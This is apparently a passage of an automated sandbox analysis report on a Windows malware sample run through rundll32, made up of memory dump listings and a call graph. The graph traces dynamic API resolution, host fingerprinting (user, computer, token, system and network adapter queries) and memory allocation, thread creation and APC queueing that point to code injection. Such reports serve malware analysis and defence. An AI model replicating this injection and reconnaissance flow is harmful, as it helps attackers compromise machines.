                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 2ee89589a5936ae31a689f7afc696f9c551bd5c68191e7446015a43d757db286
                                                                    • Instruction ID: cef74b87ca059d46a7ae97ed0c2f076cd9e916111a8c1aee72154f2e1a591406
                                                                    • Opcode Fuzzy Hash: 2ee89589a5936ae31a689f7afc696f9c551bd5c68191e7446015a43d757db286
                                                                    • Instruction Fuzzy Hash: C1114232A0578196DB148B76D85416DB361FF8ABF1F188235DA6E037E5EF7CD0158704
                                                                    Function 00007FF8A8DB9860 Relevance: 5.1, APIs: 4, Instructions: 55memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98AB
                                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98BA
                                                                    • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98E7
                                                                    • HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FF8A8D3352D), ref: 00007FF8A8DB98F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: b6a1841932a90bcf3e84ed0c1c01948b9f25d7b071fcb00ce4f8261a13364298
                                                                    • Instruction ID: b70ee4f4f36f71a4f7bccf61a4d5632cdf5b1accc238a70cc193412edab06978
                                                                    • Opcode Fuzzy Hash: b6a1841932a90bcf3e84ed0c1c01948b9f25d7b071fcb00ce4f8261a13364298
                                                                    • Instruction Fuzzy Hash: 38119435E06741A6DB048B3594842396761EF8ABF1F189635DA7E033E4FF3CD5469218

                                                                    Execution Graph

                                                                    Execution Coverage:5.1%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:1294
                                                                    Total number of Limit Nodes:50
                                                                    execution_graph 18352 2761964b530 18353 2761964b550 18352->18353 18354 2761964b5c2 18353->18354 18355 2761962a050 RtlFreeHeap 18353->18355 18356 2761964b58f 18355->18356 18360 2761964b5e0 18356->18360 18359 2761964b4e0 RtlFreeHeap 18359->18354 18364 2761964b5f6 18360->18364 18361 2761964b77a 18362 27619639830 RtlFreeHeap 18361->18362 18363 2761964bc69 18362->18363 18365 2761964b4e0 RtlFreeHeap 18363->18365 18364->18361 18366 2761964b750 18364->18366 18383 2761964b77f 18364->18383 18367 2761964bc71 18365->18367 18394 27619646a60 18366->18394 18369 2761964b4e0 RtlFreeHeap 18367->18369 18378 2761964bc91 18369->18378 18370 27619639830 RtlFreeHeap 18371 2761964ba56 18370->18371 18372 2761964b4e0 RtlFreeHeap 18371->18372 18373 2761964ba5e 18372->18373 18373->18361 18376 2761964ba6c 18373->18376 18377 2761964ba97 18373->18377 18375 27619653ba0 RtlFreeHeap 18380 2761964b9be 18375->18380 18416 27619643a20 18376->18416 18382 2761964ba95 18377->18382 18442 276196437b0 18377->18442 18384 2761964b5ba 18378->18384 18387 2761964ea70 RtlFreeHeap 18378->18387 18379 2761964b8ae 18379->18361 18379->18375 18385 27619653ba0 RtlFreeHeap 18380->18385 18382->18361 18389 27619653ba0 RtlFreeHeap 18382->18389 18383->18361 18383->18379 18408 27619650790 18383->18408 18384->18359 18388 2761964b9e8 18385->18388 18387->18384 18390 27619653ba0 RtlFreeHeap 18388->18390 18391 2761964bb25 18389->18391 18392 2761964b76f 18390->18392 18393 27619653ba0 RtlFreeHeap 18391->18393 18392->18361 18392->18370 18393->18361 18398 27619646a9f 18394->18398 18395 2761964b4e0 RtlFreeHeap 18396 27619646f4b 18395->18396 18396->18392 18397 27619646dca 18399 27619653ba0 RtlFreeHeap 18397->18399 18407 27619646d91 18397->18407 18398->18397 18400 27619650790 RtlFreeHeap 18398->18400 18398->18407 18401 27619646eb1 18399->18401 18400->18397 18402 27619653ba0 RtlFreeHeap 18401->18402 18403 27619646ed7 18402->18403 18404 27619653ba0 RtlFreeHeap 18403->18404 18405 27619646efd 18404->18405 18406 27619653ba0 RtlFreeHeap 18405->18406 18406->18407 18407->18395 18407->18396 18415 276196507df 18408->18415 18409 2761964ea70 RtlFreeHeap 18410 276196507f9 18409->18410 18411 2761964b4e0 RtlFreeHeap 18410->18411 18412 276196508fb 18411->18412 18413 2761964b4e0 RtlFreeHeap 18412->18413 18414 27619650905 18413->18414 18414->18379 18415->18409 18415->18410 18420 27619643a97 18416->18420 18437 27619643a8c 18416->18437 18417 27619639830 RtlFreeHeap 18418 27619643e3c 18417->18418 18421 27619643e4e 18418->18421 18425 2761964ea70 RtlFreeHeap 18418->18425 18419 27619643c01 18422 27619643c6b 18419->18422 18423 27619643ca4 18419->18423 18420->18419 18420->18437 18456 276196496c0 18420->18456 18426 2761964b4e0 RtlFreeHeap 18421->18426 18460 27619626340 18422->18460 18424 27619643cab 18423->18424 18433 27619643ce0 18423->18433 18468 27619623eb0 18424->18468 18425->18421 18429 27619643e5b 18426->18429 18430 2761964b4e0 RtlFreeHeap 18429->18430 18432 27619643e68 18430->18432 18432->18382 18435 27619643c9f 18433->18435 18476 27619623c30 18433->18476 18435->18437 18494 27619625d60 18435->18494 18437->18417 18438 27619643ac6 18438->18437 18439 27619643bb8 18438->18439 18440 2761964ea70 RtlFreeHeap 18438->18440 18441 27619653ba0 RtlFreeHeap 18439->18441 18440->18438 18441->18419 18445 27619643811 18442->18445 18455 276196439e5 18442->18455 18443 2761964b4e0 RtlFreeHeap 18444 276196439f8 18443->18444 18444->18382 18446 2761964387a 18445->18446 18447 276196438b3 18445->18447 18445->18455 18448 27619626340 RtlFreeHeap 18446->18448 18449 276196438ed 18447->18449 18450 276196438b8 18447->18450 18452 276196438ae 18448->18452 18449->18452 18453 27619623c30 4 API calls 18449->18453 18451 27619623eb0 RtlFreeHeap 18450->18451 18451->18452 18454 27619625d60 3 API calls 18452->18454 18453->18452 18454->18455 18455->18443 18459 276196496e2 18456->18459 18457 27619649724 18457->18438 18458 2761964b4e0 RtlFreeHeap 18458->18459 18459->18457 18459->18458 18464 27619626395 18460->18464 18461 27619639830 RtlFreeHeap 18462 27619626465 18461->18462 18463 2761964b4e0 RtlFreeHeap 18462->18463 18465 2761962646f 18463->18465 18464->18461 18466 27619626488 18465->18466 18467 2761964ea70 RtlFreeHeap 18465->18467 18466->18435 18467->18466 18473 27619623f23 18468->18473 18469 27619639830 RtlFreeHeap 18470 27619624328 18469->18470 18471 2761964b4e0 RtlFreeHeap 18470->18471 18472 27619624332 18471->18472 18474 2761964ea70 RtlFreeHeap 18472->18474 18475 2761962434c 18472->18475 18473->18469 18474->18475 18475->18435 18477 27619623ca3 18476->18477 18479 27619623cae 18476->18479 18526 27619653f40 18477->18526 18491 27619653f40 NtAllocateVirtualMemory 18479->18491 18493 27619623cac 18479->18493 18480 27619639830 RtlFreeHeap 18482 27619623d20 18480->18482 18481 27619623ca8 18481->18493 18530 27619654be0 18481->18530 18484 2761964b4e0 RtlFreeHeap 18482->18484 18485 27619623d2a 18484->18485 18486 2761964ea70 RtlFreeHeap 18485->18486 18489 27619623da0 18485->18489 18487 27619623d4e 18486->18487 18488 27619623d78 18487->18488 18490 27619654740 NtFreeVirtualMemory 18487->18490 18488->18489 18492 27619654740 NtFreeVirtualMemory 18488->18492 18489->18435 18490->18488 18491->18493 18492->18489 18493->18480 18495 27619625dc2 18494->18495 18524 27619625ec8 18494->18524 18497 27619653ba0 RtlFreeHeap 18495->18497 18496 27619639830 RtlFreeHeap 18498 276196262e5 18496->18498 18499 27619625e0a 18497->18499 18501 2761964b4e0 RtlFreeHeap 18498->18501 18500 27619653ba0 RtlFreeHeap 18499->18500 18503 27619625e2d 18500->18503 18502 276196262ed 18501->18502 18504 27619626304 18502->18504 18506 2761964ea70 RtlFreeHeap 18502->18506 18505 27619653ba0 RtlFreeHeap 18503->18505 18508 27619626319 18504->18508 18509 2761964ea70 RtlFreeHeap 18504->18509 18507 27619625e50 18505->18507 18506->18504 18510 27619625e68 18507->18510 18511 27619625ecd 18507->18511 18508->18437 18509->18508 18517 27619653ba0 RtlFreeHeap 18510->18517 18510->18524 18512 27619625ed7 18511->18512 18513 27619625f6a 18511->18513 18518 27619653ba0 RtlFreeHeap 18512->18518 18512->18524 18514 27619625f8b 18513->18514 18521 276196261a1 18513->18521 18515 2761962605a 18514->18515 18516 27619626033 18514->18516 18525 27619626006 18514->18525 18520 27619654360 NtCreateThreadEx 18515->18520 18519 27619654360 NtCreateThreadEx 18516->18519 18517->18524 18518->18524 18519->18525 18520->18525 18523 27619654ff0 NtQueueApcThread 18521->18523 18521->18524 18522 27619653ba0 RtlFreeHeap 18522->18524 18523->18524 18524->18496 18525->18522 18525->18524 18528 27619653f69 18526->18528 18527 27619653fc9 18527->18481 18528->18527 18529 27619653fc7 NtAllocateVirtualMemory 18528->18529 18529->18527 18532 27619654c02 18530->18532 18531 27619654c5e 18531->18479 18532->18531 18533 27619654c5c NtProtectVirtualMemory 18532->18533 18533->18531 17143 27619621600 17145 2761962162c 17143->17145 17144 27619621792 RtlExitUserThread 17145->17144 17152 27619653ba0 17145->17152 17147 27619621717 17158 27619639830 17147->17158 17149 27619621735 17150 2761964b4e0 RtlFreeHeap 17149->17150 17151 2761962173d 17150->17151 17151->17144 17153 27619653bd8 17152->17153 17154 27619653bc7 17152->17154 17156 27619653c87 17153->17156 17157 27619653cd0 RtlFreeHeap 17153->17157 17162 27619653cd0 17154->17162 17156->17147 17157->17156 17159 2761963984d 17158->17159 17161 27619639886 17159->17161 17172 2761963dfc0 17159->17172 17166 27619653d18 17162->17166 17163 27619653d56 17164 2761964b4e0 RtlFreeHeap 17163->17164 17165 27619653dcc 17164->17165 17165->17153 17166->17163 17168 2761964b4e0 17166->17168 17169 2761964b523 17168->17169 17170 2761964b4f0 17168->17170 17169->17163 17170->17169 17171 2761964b511 RtlFreeHeap 17170->17171 17171->17169 17174 2761963dff1 17172->17174 17173 2761963e03d 17173->17161 17174->17173 17175 2761964b4e0 RtlFreeHeap 17174->17175 17175->17173 17896 27619654be0 17898 27619654c02 17896->17898 17897 27619654c5e 17898->17897 17899 27619654c5c NtProtectVirtualMemory 17898->17899 17899->17897 17176 27619627bf0 17177 27619627c06 17176->17177 17192 27619622930 17177->17192 17180 27619627c24 17331 27619628ed0 17180->17331 17181 27619627d64 17364 27619627f70 17181->17364 17183 27619627d8c 17505 27619644d00 GetUserNameW GetComputerNameExW 17183->17505 17185 27619627f54 17186 27619627da4 17186->17185 17537 27619654740 17186->17537 17190 27619627e3b 17190->17185 17191 27619634700 RtlFreeHeap 17190->17191 17541 27619633d90 17190->17541 17587 27619628bc0 17190->17587 17191->17190 17636 2761962ffe0 17192->17636 17198 2761962f5f5 17198->17180 17199 27619622943 17199->17198 17200 2761962cce0 LdrGetProcedureAddress 17199->17200 17201 2761962ee10 17200->17201 17202 2761962cce0 LdrGetProcedureAddress 17201->17202 17203 2761962ee2b 17202->17203 17204 2761962cce0 LdrGetProcedureAddress 17203->17204 17205 2761962ee54 17204->17205 17206 2761962cce0 LdrGetProcedureAddress 17205->17206 17207 2761962ee73 17206->17207 17208 2761962cce0 LdrGetProcedureAddress 17207->17208 17209 2761962ee92 17208->17209 17210 2761962cce0 LdrGetProcedureAddress 17209->17210 17211 2761962eeb1 17210->17211 17212 2761962cce0 LdrGetProcedureAddress 17211->17212 17213 2761962eed0 17212->17213 17214 2761962cce0 LdrGetProcedureAddress 17213->17214 17215 2761962eeef 17214->17215 17216 2761962cce0 LdrGetProcedureAddress 17215->17216 17217 2761962ef0e 17216->17217 17218 2761962cce0 LdrGetProcedureAddress 17217->17218 17219 2761962ef2d 17218->17219 17220 2761962cce0 LdrGetProcedureAddress 17219->17220 17221 2761962ef4c 17220->17221 17222 2761962cce0 LdrGetProcedureAddress 17221->17222 17223 2761962ef6b 17222->17223 17224 2761962cce0 LdrGetProcedureAddress 17223->17224 17225 2761962ef8a 17224->17225 17226 2761962cce0 LdrGetProcedureAddress 17225->17226 17227 2761962efa9 17226->17227 17228 2761962cce0 LdrGetProcedureAddress 17227->17228 17229 2761962efc8 17228->17229 17230 2761962cce0 LdrGetProcedureAddress 17229->17230 17231 2761962efe7 17230->17231 17232 2761962cce0 LdrGetProcedureAddress 17231->17232 17233 2761962f006 17232->17233 17234 2761962cce0 LdrGetProcedureAddress 17233->17234 17235 2761962f025 17234->17235 17236 2761962cce0 LdrGetProcedureAddress 17235->17236 17237 2761962f044 17236->17237 17238 2761962cce0 LdrGetProcedureAddress 17237->17238 17239 2761962f063 17238->17239 17240 2761962cce0 LdrGetProcedureAddress 17239->17240 17241 2761962f082 17240->17241 17242 2761962cce0 LdrGetProcedureAddress 17241->17242 17243 2761962f0a1 17242->17243 17244 2761962cce0 LdrGetProcedureAddress 17243->17244 17245 2761962f0c0 17244->17245 17246 2761962cce0 LdrGetProcedureAddress 17245->17246 17247 2761962f0df 17246->17247 17248 2761962cce0 LdrGetProcedureAddress 17247->17248 17249 2761962f0fe 17248->17249 17250 2761962cce0 LdrGetProcedureAddress 17249->17250 17251 2761962f11d 17250->17251 17252 2761962cce0 LdrGetProcedureAddress 17251->17252 17253 2761962f13c 17252->17253 17254 2761962cce0 LdrGetProcedureAddress 17253->17254 17255 2761962f15b 17254->17255 17256 2761962cce0 LdrGetProcedureAddress 17255->17256 17257 2761962f17a 17256->17257 17258 2761962cce0 LdrGetProcedureAddress 17257->17258 17259 2761962f199 17258->17259 17260 2761962cce0 LdrGetProcedureAddress 17259->17260 17261 2761962f1b8 17260->17261 17262 2761962cce0 LdrGetProcedureAddress 17261->17262 17263 2761962f1d7 17262->17263 17264 2761962cce0 LdrGetProcedureAddress 17263->17264 17265 2761962f1f6 17264->17265 17266 2761962cce0 LdrGetProcedureAddress 17265->17266 17267 2761962f215 17266->17267 17268 2761962cce0 LdrGetProcedureAddress 17267->17268 17269 2761962f234 17268->17269 17270 2761962cce0 LdrGetProcedureAddress 17269->17270 17271 2761962f253 17270->17271 17272 2761962cce0 LdrGetProcedureAddress 17271->17272 17273 2761962f272 17272->17273 17274 2761962cce0 LdrGetProcedureAddress 17273->17274 17275 2761962f291 17274->17275 17276 2761962cce0 LdrGetProcedureAddress 17275->17276 17277 2761962f2b0 17276->17277 17278 2761962cce0 LdrGetProcedureAddress 17277->17278 17279 2761962f2cf 17278->17279 17280 2761962cce0 LdrGetProcedureAddress 17279->17280 17281 2761962f2ee 17280->17281 17282 2761962cce0 LdrGetProcedureAddress 17281->17282 17283 2761962f30d 17282->17283 17284 2761962cce0 LdrGetProcedureAddress 17283->17284 17285 2761962f32c 17284->17285 17286 2761962cce0 LdrGetProcedureAddress 17285->17286 17287 2761962f34b 17286->17287 17288 2761962cce0 LdrGetProcedureAddress 17287->17288 17289 2761962f36a 17288->17289 17290 2761962cce0 LdrGetProcedureAddress 17289->17290 17291 2761962f389 17290->17291 17292 2761962cce0 LdrGetProcedureAddress 17291->17292 17293 2761962f3a8 17292->17293 17294 2761962cce0 LdrGetProcedureAddress 17293->17294 17295 2761962f3c7 17294->17295 17296 2761962cce0 LdrGetProcedureAddress 17295->17296 17297 2761962f3e6 17296->17297 17298 2761962cce0 LdrGetProcedureAddress 17297->17298 17299 2761962f405 17298->17299 17300 2761962cce0 LdrGetProcedureAddress 17299->17300 17301 2761962f424 17300->17301 17302 2761962cce0 LdrGetProcedureAddress 17301->17302 17303 2761962f443 17302->17303 17304 2761962cce0 LdrGetProcedureAddress 17303->17304 17305 2761962f462 17304->17305 17306 2761962cce0 LdrGetProcedureAddress 17305->17306 17307 2761962f481 17306->17307 17308 2761962cce0 LdrGetProcedureAddress 17307->17308 17309 2761962f4a0 17308->17309 17310 2761962cce0 LdrGetProcedureAddress 17309->17310 17311 2761962f4bf 17310->17311 17312 2761962cce0 LdrGetProcedureAddress 17311->17312 17313 2761962f4de 17312->17313 17314 2761962cce0 LdrGetProcedureAddress 17313->17314 17315 2761962f4fd 17314->17315 17316 2761962cce0 LdrGetProcedureAddress 17315->17316 17317 2761962f51c 17316->17317 17318 2761962cce0 LdrGetProcedureAddress 17317->17318 17319 2761962f53b 17318->17319 17320 2761962cce0 LdrGetProcedureAddress 17319->17320 17321 2761962f55a 17320->17321 17322 2761962cce0 LdrGetProcedureAddress 17321->17322 17323 2761962f579 17322->17323 17324 2761962cce0 LdrGetProcedureAddress 17323->17324 17325 2761962f598 17324->17325 17326 2761962cce0 LdrGetProcedureAddress 17325->17326 17327 2761962f5b7 17326->17327 17328 2761962cce0 LdrGetProcedureAddress 17327->17328 17329 2761962f5d6 17328->17329 17330 2761962cce0 LdrGetProcedureAddress 17329->17330 17330->17198 17708 27619644ce0 17331->17708 17336 27619653de0 RtlFreeHeap 17337 276196290af 17336->17337 17338 27619653de0 RtlFreeHeap 17337->17338 17339 27619629110 17338->17339 17340 27619653de0 RtlFreeHeap 17339->17340 17341 2761962916c 17340->17341 17342 27619653de0 RtlFreeHeap 17341->17342 17343 276196291a1 17342->17343 17344 27619653de0 RtlFreeHeap 17343->17344 17345 276196291f1 17344->17345 17346 27619653de0 RtlFreeHeap 17345->17346 17347 27619629222 17346->17347 17348 27619653de0 RtlFreeHeap 17347->17348 17349 2761962925a 17348->17349 17350 27619653de0 RtlFreeHeap 17349->17350 17351 276196292af 17350->17351 17352 27619653de0 RtlFreeHeap 17351->17352 17353 276196292f1 17352->17353 17354 27619653de0 RtlFreeHeap 17353->17354 17355 27619629333 17354->17355 17356 27619653de0 RtlFreeHeap 17355->17356 17357 27619629347 17356->17357 17358 27619653de0 RtlFreeHeap 17357->17358 17359 27619629362 17358->17359 17360 27619653de0 RtlFreeHeap 17359->17360 17361 2761962938e 17360->17361 17362 27619653de0 RtlFreeHeap 17361->17362 17363 276196293c1 17362->17363 17363->17181 17365 27619627fb8 17364->17365 17366 27619627f99 17364->17366 17368 27619627fda 17365->17368 17369 27619653de0 RtlFreeHeap 17365->17369 17367 27619653de0 RtlFreeHeap 17366->17367 17367->17365 17714 27619645560 17368->17714 17369->17368 17373 27619645560 RtlFreeHeap 17377 27619628066 17373->17377 17374 2761962802a 17374->17373 17375 27619628088 17376 27619645560 RtlFreeHeap 17375->17376 17381 2761962809c 17376->17381 17377->17375 17379 2761964b4e0 RtlFreeHeap 17377->17379 17378 276196280be 17380 27619645560 RtlFreeHeap 17378->17380 17379->17375 17385 276196280d2 17380->17385 17381->17378 17382 2761964b4e0 RtlFreeHeap 17381->17382 17382->17378 17383 276196280f4 17384 27619645560 RtlFreeHeap 17383->17384 17389 27619628108 17384->17389 17385->17383 17387 2761964b4e0 RtlFreeHeap 17385->17387 17386 2761962812a 17388 27619645560 RtlFreeHeap 17386->17388 17387->17383 17393 2761962813e 17388->17393 17389->17386 17390 2761964b4e0 RtlFreeHeap 17389->17390 17390->17386 17391 27619628160 17392 27619645560 RtlFreeHeap 17391->17392 17397 27619628174 17392->17397 17393->17391 17394 2761964b4e0 RtlFreeHeap 17393->17394 17394->17391 17395 27619628197 17396 27619645560 RtlFreeHeap 17395->17396 17401 276196281ab 17396->17401 17397->17395 17398 2761964b4e0 RtlFreeHeap 17397->17398 17398->17395 17399 276196281d4 17400 27619645560 RtlFreeHeap 17399->17400 17402 276196281e8 17400->17402 17401->17399 17403 2761964b4e0 RtlFreeHeap 17401->17403 17404 2761962823d 17402->17404 17406 2761963be20 RtlFreeHeap 17402->17406 17403->17399 17405 27619645560 RtlFreeHeap 17404->17405 17427 27619628251 17405->17427 17407 27619628214 17406->17407 17410 2761964b4e0 RtlFreeHeap 17407->17410 17408 2761962838a 17409 27619645560 RtlFreeHeap 17408->17409 17411 2761962839e 17409->17411 17412 27619628235 17410->17412 17413 27619645560 RtlFreeHeap 17411->17413 17414 2761964b4e0 RtlFreeHeap 17412->17414 17418 276196283ba 17413->17418 17414->17404 17415 27619628b86 17415->17183 17416 27619628430 17417 27619645560 RtlFreeHeap 17416->17417 17419 27619628444 17417->17419 17418->17415 17418->17416 17431 2761964b4e0 RtlFreeHeap 17418->17431 17420 2761962846d 17419->17420 17425 2761963be20 RtlFreeHeap 17419->17425 17426 27619645560 RtlFreeHeap 17420->17426 17421 2761962835d 17424 2761964b4e0 RtlFreeHeap 17421->17424 17422 27619628322 17422->17421 17434 2761962a050 RtlFreeHeap 17422->17434 17428 2761962837d 17424->17428 17429 27619628460 17425->17429 17430 2761962848e 17426->17430 17427->17408 17427->17422 17722 2761962a050 17427->17722 17432 2761964b4e0 RtlFreeHeap 17428->17432 17433 2761964b4e0 RtlFreeHeap 17429->17433 17435 276196284b7 17430->17435 17437 2761963be20 RtlFreeHeap 17430->17437 17436 27619628423 17431->17436 17432->17408 17433->17420 17434->17421 17440 27619645560 RtlFreeHeap 17435->17440 17438 2761964b4e0 RtlFreeHeap 17436->17438 17439 276196284aa 17437->17439 17438->17416 17441 2761964b4e0 RtlFreeHeap 17439->17441 17442 276196284d8 17440->17442 17441->17435 17443 27619628501 17442->17443 17444 2761963be20 RtlFreeHeap 17442->17444 17445 27619645560 RtlFreeHeap 17443->17445 17446 276196284f4 17444->17446 17447 27619628522 17445->17447 17448 2761964b4e0 RtlFreeHeap 17446->17448 17449 2761962854b 17447->17449 17450 2761963be20 RtlFreeHeap 17447->17450 17448->17443 17452 27619645560 RtlFreeHeap 17449->17452 17451 2761962853e 17450->17451 17453 2761964b4e0 RtlFreeHeap 17451->17453 17454 2761962856c 17452->17454 17453->17449 17455 27619628595 17454->17455 17456 2761963be20 RtlFreeHeap 17454->17456 17458 27619645560 RtlFreeHeap 17455->17458 17457 27619628588 17456->17457 17459 2761964b4e0 RtlFreeHeap 17457->17459 17460 276196285b6 17458->17460 17459->17455 17461 27619645560 RtlFreeHeap 17460->17461 17462 276196285d2 17461->17462 17462->17415 17463 2761964b4e0 RtlFreeHeap 17462->17463 17464 27619628625 17463->17464 17465 2761964b4e0 RtlFreeHeap 17464->17465 17466 2761962865e 17465->17466 17467 27619645560 RtlFreeHeap 17466->17467 17469 27619628672 17467->17469 17468 2761964b4e0 RtlFreeHeap 17470 27619628797 17468->17470 17469->17415 17469->17468 17471 2761964b4e0 RtlFreeHeap 17470->17471 17472 276196287a4 17471->17472 17473 27619645560 RtlFreeHeap 17472->17473 17474 276196287b8 17473->17474 17474->17415 17475 2761964b4e0 RtlFreeHeap 17474->17475 17476 276196287ec 17475->17476 17477 27619645560 RtlFreeHeap 17476->17477 17478 27619628800 17477->17478 17478->17415 17479 2761964b4e0 RtlFreeHeap 17478->17479 17480 2761962882d 17479->17480 17481 27619645560 RtlFreeHeap 17480->17481 17482 27619628841 17481->17482 17483 27619645560 RtlFreeHeap 17482->17483 17484 2761962885d 17483->17484 17484->17415 17485 2761964b4e0 RtlFreeHeap 17484->17485 17486 27619628897 17485->17486 17487 27619645560 RtlFreeHeap 17486->17487 17488 276196288ab 17487->17488 17488->17415 17489 2761964b4e0 RtlFreeHeap 17488->17489 17490 276196289c8 17489->17490 17491 2761964b4e0 RtlFreeHeap 17490->17491 17492 276196289d5 17491->17492 17493 27619645560 RtlFreeHeap 17492->17493 17502 276196289eb 17493->17502 17494 27619628aec 17498 2761963be20 RtlFreeHeap 17494->17498 17504 27619628b47 17494->17504 17495 2761963be20 RtlFreeHeap 17495->17502 17496 2761964b4e0 RtlFreeHeap 17497 27619628b79 17496->17497 17499 2761964b4e0 RtlFreeHeap 17497->17499 17500 27619628b2a 17498->17500 17499->17415 17503 2761964b4e0 RtlFreeHeap 17500->17503 17501 2761964b4e0 RtlFreeHeap 17501->17502 17502->17415 17502->17494 17502->17495 17502->17501 17503->17504 17504->17496 17506 27619644dc7 GetComputerNameExW 17505->17506 17507 27619644db1 17505->17507 17508 27619644def 17506->17508 17507->17506 17509 27619644df3 GetTokenInformation 17508->17509 17514 27619644e4e 17508->17514 17510 27619644e1c 17509->17510 17509->17514 17511 27619644e3e 17510->17511 17512 27619653de0 RtlFreeHeap 17510->17512 17513 27619653de0 RtlFreeHeap 17511->17513 17512->17511 17513->17514 17515 2761963dfc0 RtlFreeHeap 17514->17515 17516 27619644e90 17515->17516 17517 27619644eaa GetNativeSystemInfo 17516->17517 17518 27619653de0 RtlFreeHeap 17516->17518 17519 27619644ee8 17517->17519 17520 27619644ed3 17517->17520 17518->17517 17519->17520 17521 27619644f17 17519->17521 17522 27619653de0 RtlFreeHeap 17520->17522 17523 27619653de0 RtlFreeHeap 17521->17523 17524 27619644f15 17522->17524 17523->17524 17528 27619653de0 RtlFreeHeap 17524->17528 17530 27619644f67 17524->17530 17525 27619644f8f GetAdaptersInfo 17526 27619644fbb 17525->17526 17527 27619644fdd 17525->17527 17529 2761964b4e0 RtlFreeHeap 17526->17529 17527->17526 17533 27619644fea GetAdaptersInfo 17527->17533 17528->17530 17531 27619644fc5 17529->17531 17530->17525 17532 2761964b4e0 RtlFreeHeap 17531->17532 17534 27619644fcd 17532->17534 17533->17526 17535 27619644fff 17533->17535 17534->17186 17535->17526 17536 27619653de0 RtlFreeHeap 17535->17536 17536->17535 17539 27619654759 17537->17539 17538 276196547af 17538->17190 17539->17538 17540 276196547ad NtFreeVirtualMemory 17539->17540 17540->17538 17726 27619633270 17541->17726 17544 27619653de0 RtlFreeHeap 17545 27619633ebe 17544->17545 17546 27619653de0 RtlFreeHeap 17545->17546 17547 27619633ee0 17546->17547 17548 27619653de0 RtlFreeHeap 17547->17548 17549 27619633f02 17548->17549 17550 2761964b4e0 RtlFreeHeap 17549->17550 17551 27619633f1d 17550->17551 17552 2761964b4e0 RtlFreeHeap 17551->17552 17553 27619633f61 17552->17553 17555 27619633fd9 17553->17555 17556 27619633fc0 17553->17556 17561 27619633fd7 17553->17561 17554 2761962a050 RtlFreeHeap 17557 27619634005 17554->17557 17558 2761962a050 RtlFreeHeap 17555->17558 17560 2761962a050 RtlFreeHeap 17556->17560 17556->17561 17559 2761964b4e0 RtlFreeHeap 17557->17559 17558->17561 17562 2761963400d 17559->17562 17560->17561 17561->17554 17561->17557 17563 2761964b4e0 RtlFreeHeap 17562->17563 17564 27619634015 17563->17564 17565 27619634067 17564->17565 17566 27619634060 17564->17566 17826 27619627830 17565->17826 17750 27619636fa0 17566->17750 17569 27619634065 17570 2761964b4e0 RtlFreeHeap 17569->17570 17571 2761963407f 17570->17571 17572 276196340bb 17571->17572 17573 2761963be20 RtlFreeHeap 17571->17573 17574 2761964b4e0 RtlFreeHeap 17572->17574 17575 276196340ac 17573->17575 17576 2761963411c 17574->17576 17577 276196340b3 17575->17577 17585 276196340bd 17575->17585 17578 2761964b4e0 RtlFreeHeap 17576->17578 17579 2761964b4e0 RtlFreeHeap 17577->17579 17580 27619634124 17578->17580 17579->17572 17581 2761964b4e0 RtlFreeHeap 17580->17581 17582 2761963412c 17581->17582 17583 2761964b4e0 RtlFreeHeap 17582->17583 17584 27619634139 17583->17584 17584->17190 17586 2761964b4e0 RtlFreeHeap 17585->17586 17586->17572 17588 27619628bde 17587->17588 17589 2761962a050 RtlFreeHeap 17588->17589 17590 27619628c5e 17589->17590 17591 2761962a050 RtlFreeHeap 17590->17591 17592 27619628c97 17591->17592 17593 2761964b4e0 RtlFreeHeap 17592->17593 17594 27619628cee 17593->17594 17595 27619628d5c 17594->17595 17597 27619628d5e 17594->17597 17598 27619628d44 17594->17598 17596 2761962a050 RtlFreeHeap 17595->17596 17599 27619628d8b 17595->17599 17596->17599 17600 2761962a050 RtlFreeHeap 17597->17600 17598->17595 17602 2761962a050 RtlFreeHeap 17598->17602 17601 2761964b4e0 RtlFreeHeap 17599->17601 17600->17595 17603 27619628d93 17601->17603 17602->17595 17604 2761964b4e0 RtlFreeHeap 17603->17604 17605 27619628d9b 17604->17605 17606 27619628de9 17605->17606 17607 27619628df0 17605->17607 17608 27619636fa0 2 API calls 17606->17608 17609 27619627830 7 API calls 17607->17609 17610 27619628dee 17608->17610 17609->17610 17611 27619628e8e 17610->17611 17612 